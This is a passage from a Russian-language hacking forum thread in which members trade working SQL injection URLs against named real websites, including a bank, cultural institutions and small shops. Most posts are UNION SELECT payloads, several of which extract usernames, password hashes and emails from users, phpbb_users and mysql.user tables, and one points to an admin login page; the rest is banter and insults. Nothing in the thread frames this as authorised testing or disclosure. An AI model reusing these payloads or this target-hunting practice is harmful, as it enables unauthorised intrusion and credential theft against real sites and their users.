SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. Colkru

    Colkru Elder - Старейшина

    Joined:
    13 Jan 2007
    Messages:
    100
    Likes Received:
    69
    Reputations:
    9
    Уже было, в этом же скрипте.

    _____

    Code:
    http://dewerelddraaitdoor.vara.nl/nieuws_laatste.php?id=-1+union+select+1,2,3,version(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19/*
     
  2. BlackCats

    BlackCats Elder - Старейшина

    Joined:
    1 Feb 2006
    Messages:
    642
    Likes Received:
    630
    Reputations:
    -3
    и-в жопу.
    http://www.clasp.org/publications.php?id=-16+union+select+1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15/*
     
  3. Colkru

    Colkru Elder - Старейшина

    Joined:
    13 Jan 2007
    Messages:
    100
    Likes Received:
    69
    Reputations:
    9
    Тоже было и тоже в этом скрипте... :D
    +++
    Скуля:
    Code:
    http://director-online.com/buildArticle.php?id=-1+union+select+1,2,3,4,5,6,7,8+from+user/*
     
  4. Ksander

    Ksander Elder - Старейшина

    Joined:
    21 Jun 2006
    Messages:
    526
    Likes Received:
    260
    Reputations:
    138
    Моё кунг-фу сильнее твоего

    Code:
    http://www.clasp.org/publications.php?id=-16+union+select+1,2,password,4,5,6,7,8,9,10,11,12,13,14,15+from+user/*
     
  5. Colkru

    Colkru Elder - Старейшина

    Joined:
    13 Jan 2007
    Messages:
    100
    Likes Received:
    69
    Reputations:
    9
    А еще лучше так:

    http://www.clasp.org/publications.php?id=-1+union+select+1,2,concat(username,char(58),password),4,5,6,6,8,9,10,11,12,13,14,15+from+user/*

    И админка:

    http://www.clasp.org/admin/login.php
     
    #965 Colkru, 13 Mar 2007
    Last edited: 13 Mar 2007
  6. BlackCats

    BlackCats Elder - Старейшина

    Joined:
    1 Feb 2006
    Messages:
    642
    Likes Received:
    630
    Reputations:
    -3
    http://www.mooreindhardware.com/products.php?id=-2+union+select+1,2,version()
     
  7. Colkru

    Colkru Elder - Старейшина

    Joined:
    13 Jan 2007
    Messages:
    100
    Likes Received:
    69
    Reputations:
    9
    И сново повтор :eek: :eek: :( .
    ===
    Скуля:

    Code:
    http://www.chicagomediaaction.org/news.php?id=-1+union+select+1,version(),3,4,5,6,7,8/*
     
  8. }{0TT@БЬ)Ч

    }{0TT@БЬ)Ч Elder - Старейшина

    Joined:
    20 Jan 2006
    Messages:
    269
    Likes Received:
    140
    Reputations:
    31
    что то мне подсказывает что там нет скули :D :D
     
  9. Ksander

    Ksander Elder - Старейшина

    Joined:
    21 Jun 2006
    Messages:
    526
    Likes Received:
    260
    Reputations:
    138
    Точно, замучался подбирая так и не нашел =(

    100%, проверял и не один раз, и вот еще одна там же

    Code:
    http://www.mercedes-benz.ru/faq/?type=sql-inj
     
    #969 Ksander, 13 Mar 2007
    Last edited: 13 Mar 2007
  10. BlackCats

    BlackCats Elder - Старейшина

    Joined:
    1 Feb 2006
    Messages:
    642
    Likes Received:
    630
    Reputations:
    -3
    http://www.karlcore.com/articles/article.php?id=-6+union+select+1,2,3,4,5,6

    colkru идёт на***!!!
     
  11. Colkru

    Colkru Elder - Старейшина

    Joined:
    13 Jan 2007
    Messages:
    100
    Likes Received:
    69
    Reputations:
    9
    И почему сруз на*** (кстати эта скуля тоже была) :D
    Смотри тут я начал собирать лист всех скулей выложеных в этой теме(для себя), пока там до 53 стр., 86,87. Так что можеш юзать нажатием клавиши
    ctrl+F. Потом дам лист (если хочеш) со всеми скулями(чтобы не было повторов).
    .
    p.s. сорри за офтоп.
    Скуля:

    Code:
    http://texte.ruprecht.de/zeigartikel.php?id=-1+union+select+1,convert(version()+using+latin1),3,4,5,6,7,8,9,10,11/*
     
  12. BlackCats

    BlackCats Elder - Старейшина

    Joined:
    1 Feb 2006
    Messages:
    642
    Likes Received:
    630
    Reputations:
    -3
    http://www.dvdfuture.com/features.php?id=-7+union+select+version(),2,3,4,5,6,7/*

    PS
    если colkru 3.14здить всякий бред - то я его встречу когда он пойдёт на гитару. :mad:
     
    #972 BlackCats, 13 Mar 2007
    Last edited: 13 Mar 2007
  13. Colkru

    Colkru Elder - Старейшина

    Joined:
    13 Jan 2007
    Messages:
    100
    Likes Received:
    69
    Reputations:
    9
    Лучше так:

    PHP:
    http://www.dvdfuture.com/features.php?id=-7+union+select+1,2,concat(username,char(58),user_password),4,5,6,7+from+phpbb_users+limit+1,1/*
     
  14. Ksander

    Ksander Elder - Старейшина

    Joined:
    21 Jun 2006
    Messages:
    526
    Likes Received:
    260
    Reputations:
    138
    www.avtozazbank.com

    Code:
    http://www.avtozazbank.com/?mid=-1+union+select+1,2,3,4,5,6,7,8,9+from+users/*
     
    1 person likes this.
  15. XTErner

    XTErner Elder - Старейшина

    Joined:
    13 Mar 2007
    Messages:
    109
    Likes Received:
    135
    Reputations:
    40
    Code:
    http://www.mishijos.cl/servicios/sabiasque.php?id=-11+union+select+1,concat(user_password,char(58),username)+from+users/*
    Code:
    http://basic.forumservice.nl/lees.php?id=1&mid=-41+union+select+1,2,3,4,concat(password,0x3a,user),6,7,8+from+mysql.user/*
    Code:
     http://www.jongerenclub.nl/news.php?action=comments&id=-65+union+select+1,2,concat(username,0x3a,email,0x3a,pass,0x3a,id),4,5,6+from+users/* 
     
    1 person likes this.
  16. Colkru

    Colkru Elder - Старейшина

    Joined:
    13 Jan 2007
    Messages:
    100
    Likes Received:
    69
    Reputations:
    9
    Code:
    http://www.windsurf.ru/index.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,version()/*
    :)
     
  17. .Slip

    .Slip Elder - Старейшина

    Joined:
    16 Jan 2006
    Messages:
    1,571
    Likes Received:
    977
    Reputations:
    783
    http://www.avtozazbank.com/?mid=-1+union+select+1,2,3,4,5,6,7,concat(user_name,char(58),user_pass),9+from+users/*
     
    6 people like this.
  18. n1†R0x

    n1†R0x Elder - Старейшина

    Joined:
    20 Jan 2007
    Messages:
    728
    Likes Received:
    376
    Reputations:
    235
    да там ведь и форум бажный.. UBB хех)
    Code:
    http://www.windsurf.ru/board/showflat.php?Board=club&Number=-1+union+select+1,2,3,concat(id,0x3a,login,0x3a,email),5,6,7+from+members+limit+0,1/*
    столбик с паролем не подобрал :) тока login && email :cool:
     
  19. BlackCats

    BlackCats Elder - Старейшина

    Joined:
    1 Feb 2006
    Messages:
    642
    Likes Received:
    630
    Reputations:
    -3
    http://www.jigsawpuzzleplayer.com/pack.php?id=-7+union+select+1,2,version(),4,5,6,7
     
  20. Colkru

    Colkru Elder - Старейшина

    Joined:
    13 Jan 2007
    Messages:
    100
    Likes Received:
    69
    Reputations:
    9
    http://www.bozar.be/activity.php?id=-1+union+select+1,2,concat(name,char(58),password),4,5,6,7,8,9,10,11,concat(name,char(58),password),13,14,15,16+from+users+limit+0,1/*

    Пасс админа зашифрован(((
     
Thread Status:
Not open for further replies.